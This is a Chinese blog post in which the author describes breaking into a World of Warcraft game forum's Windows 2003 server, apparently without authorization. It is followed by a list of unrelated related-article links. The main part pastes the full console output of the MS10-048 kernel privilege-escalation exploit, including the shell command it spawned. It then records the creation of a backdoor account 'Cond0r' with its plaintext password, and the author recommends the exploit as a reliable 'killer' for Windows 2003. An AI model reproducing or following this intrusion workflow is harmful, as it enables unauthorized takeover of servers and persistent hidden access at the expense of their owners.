今天搞了个wow的游戏论坛,服务器环境是win03 x86+iis6.0+php+mysql。

提权的时候各种无奈,mysql无权限,而且没root,试了几个别的方法都不行,实在没办法的时候,用MS10048试了下,成功了。

Dojibiron by Ronald Huizer, (c) master#h4cker.us  

[ ] Trying to allocate a page at NULL.

    [+] Allocated page at 0x0000000000000000 for 0x0000000000000001

[ ] Bootstrapping kernel resolver.

    Module ntoskrnl.exe at 0x0000000000BD0000

    Base of driver: 0xFFFFF80001000000

    [+] Success.

[ ] Resolving PsReferencePrimaryToken

    [+] Success: 0xFFFFF8000129FE50

[ ] Resolving PsInitialSystemProcess

    [+] Success: 0xFFFFF800011D1FB0

[ ] Resolving PsLookupProcessByProcessId

    [+] Success: 0xFFFFF80001288BC0

[ ] Resolving PsDereferencePrimaryToken

    [+] Success: 0xFFFFF80001311B40

[+] Handle table retrieval succeeded.

    Userspace handle table: 0x00000000006B0000

    Kernelspace handle table: 0xFFFFF97FF7990000

    Handle table entries: 1024

[ ] Allocating fake HEAD page.

    [+] Allocated page at 0x0000000004000000 for 0x00000000040001FF

[ ] Setting up CBT filter hook.

    [+] Success.

[ ] Creating evil window

    [+] Success.

[ ] Destroyed handle at: 0xFFFFF97FF7990FC0

    pHead:	0xFFFFF97FF906BA00

    pOwner:	0xFFFFFA80000E8D80

    bType:	0x01 - TYPE_WINDOW

    bFlags:	0x00 -

    wUniq:	0x0004

[ ] Trigger handle at: 0xFFFFF97FF7995AC0

    pHead:	0xFFFFF97FF90900A0

    pOwner:	0xFFFFFA80000E8D80

    bType:	0x01 - TYPE_WINDOW

    bFlags:	0x00 -

    wUniq:	0x0003

[ ] Writing pool addr to: 0xFFFFF97FF7990F7F

	~ MS10_048 X64 EXP        ~

	Need a girl to love   QQ 65665651 email master#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	QQ 65665651 email master#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	aster#h4cker.us 10010101010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	01010100010101010101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	0101010101100000110101001010111001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	1001010101010101101010101010101011111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	111001101101010000000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	00000111010111111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	111010100101010111011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	011100111011000110101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	0101000000110110101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	10101011001010010101001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	1001010110101010111010111111111110101010101111010101110101010101010101010101010111100000000000110

	11111111110101010101111010101110101010101010101010101010111100000000000110

	110101010101010101010101010111100000000000110

	111100000000000110

	0000110

[ ] Checking the success flag.

    [+] Set to 2 exploit half succeeded

[ ] Destroying trigger window

    pHead:	0x00000000000003CA

    pOwner:	0x0000000000000000

    bType:	0x00 - TYPE_FREE

    bFlags:	0x00 -

    wUniq:	0x0004

[ ] Spawning half a shell...

    Command: D:\RECYCLER\add.exe

[+] Enjoy!

          ==========================================

              Api Add User Made By Cond0r

                    2011.3.20

              Adduser.exe UserName PassWord Group

          ==========================================

	 User List:

	-->  7ksf

	-->  ASPNET

	-->  Guestasdfa

	-->  IUSR_NJXW-12-5-2

	-->  IWAM_NJXW-12-5-2

	-->  SUPPORT_388945a0

	Group List:

	 --> Administrators

	 --> Backup Operators

	 --> Distributed COM Users

	 --> Guests

	 --> Network Configuration Operators

	 --> Performance Log Users

	 --> Performance Monitor Users

	 --> Power Users

	 --> Print Operators

	 --> Remote Desktop Users

	 --> Replicator

	 --> Users

	 --> HelpServicesGroup

	 --> IIS_WPG

	 --> TelnetClients 

 SuccessFul !!User "Cond0r" Pass "123!@#asdASD" Add User SuccessFul !!

利用api加用户工具,成功添加cond0r密码为123!@#asdASD的账户

MS10048依旧是Windows 2003 x86 的杀器的更多相关文章

  1. Windows 2003 FastCgi安装环境

    Windows 2003 IIS+PHP5.4.3 安装教程 一.准备相关组件 安装前,先安装IIS. 1.安装FastCgi for IIS6 Fastcgi官方网址是:http://www.iis ...

  2. Windows 2003上 SaltStack/Salt 和 psutil 可能存在的问题及解决

    今天把salt安装在windows 2003上,发现无法启动,随之而来的是一个有一个的坑,让我们一起逐个排查. 问题一(salt无法启动) salt无法启动,错误结果如图:

  3. Windows 2003】利用域&&组策略自动部署软件

    Windows 2003]利用域&&组策略自动部署软件 转自 http://hi.baidu.com/qu6zhi/item/4c0fa100dc768613cc34ead0 ==== ...

  4. 使用docker-compose 大杀器来部署服务 上

    使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker,然而使用方式却是仅仅用手动的方式,这样去操作 docker 还是很原始. 好吧,可能在小白的眼中噼里啪啦的对着 ...

  5. Windows 2003 Server 标准版启动问题解决(资源转贴)

    维护的系统之一是部署在windows2003 Server标准版的服务器上,可能是由于某个应用问题,导致远程重启失败,害得我在机房呆了一早晨,可算是够折腾的.最后按照官方文档解决,刚放文档地址是:ht ...

  6. 使用docker-compose 大杀器来部署服务 上(转)

    使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker,然而使用方式却是仅仅用手动的方式,这样去操作 docker 还是很原始. 好吧,可能在小白的眼中噼里啪啦的对着 ...

  7. 利用pentestbox打造ms17-010移动"杀器"

    本文首发Freebuf,属原创奖励计划,未经许可禁止转载. 链接:http://www.freebuf.com/articles/system/132274.html 一. 前言 前段时间Shadow ...

  8. [转]使用docker-compose 大杀器来部署服务 上

    本文转自:https://www.cnblogs.com/neptunemoon/p/6512121.html 使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker ...

  9. 使用docker-compose 大杀器来部署服务

    使用docker-compose 大杀器来部署服务 上 我们都听过或者用过 docker,然而使用方式却是仅仅用手动的方式,这样去操作 docker 还是很原始. 好吧,可能在小白的眼中噼里啪啦的对着 ...

随机推荐

  1. ShortestPath:Layout(POJ 3169)(差分约束的应用)

                布局 题目大意:有N头牛,编号1-N,按编号排成一排准备吃东西,有些牛的关系比较好,所以希望他们不超过一定的距离,也有一些牛的关系很不好,所以希望彼此之间要满足某个关系,牛可以 ...

  2. Maven的安装、配置及使用入门

    Maven的安装.配置及使用入门 本书代码下载 大家可以从我的网站下载本书的代码:http://www.juvenxu.com/mvn-in-action/,也可以通过我的网站与我取得联系,欢迎大家与 ...

  3. jquery给height拼接动态变量

    var sizeLength = "${list.size()}"; if(sizeLength==''){ sizeLength=0; } sizeLength=400*size ...

  4. 【USACO】milk3

    倒牛奶的问题, 开始看感觉跟倒水的问题很像, 想直接找规律, 写个类似于循环取余的代码. 但后来发现不行,因为这道题有三个桶,水量也是有限制的.只好用模拟的方法把所有的情况都试一遍. 建一个state ...

  5. SQLHelper、DBUtil终极封装

    DBUtil.java package org.guangsoft.util; import java.io.InputStream; import java.sql.Connection; impo ...

  6. [Android Pro] ant 编译android工程

    参考文章: http://blog.csdn.net/xyz_lmn/article/details/7268582?reload http://hubingforever.blog.163.com/ ...

  7. July 24th, Week 31st Sunday, 2016

    Miracles happen every day. 奇迹每天都在发生. Miracles actually happen every day, every moment. You may think ...

  8. linux环境下配置虚拟主机域名

    linux环境下面配置虚拟主机域名 第一步:在root目录下面(即根目录)ls(查看文件)cd进入etc目录find hosts文件vi hosts 打开hosts文件并进行编辑在打开的文件最下面添加 ...

  9. tomcat The file is absent or does not have execute permission

    [root@centos02 bin]# ./startup.sh Cannot find ./catalina.sh The file is absent or does not have exec ...

  10. 我的MySQL5.6免安装版配置过程

    最近打算学习MySQL,第一步就是安装.下载到一个面安装版.解压到我的D盘的mysql目录. 弄了一个最简单的配置文件.目录中只有一个my-default.ini,基本没啥用.在网上弄了一个my.in ...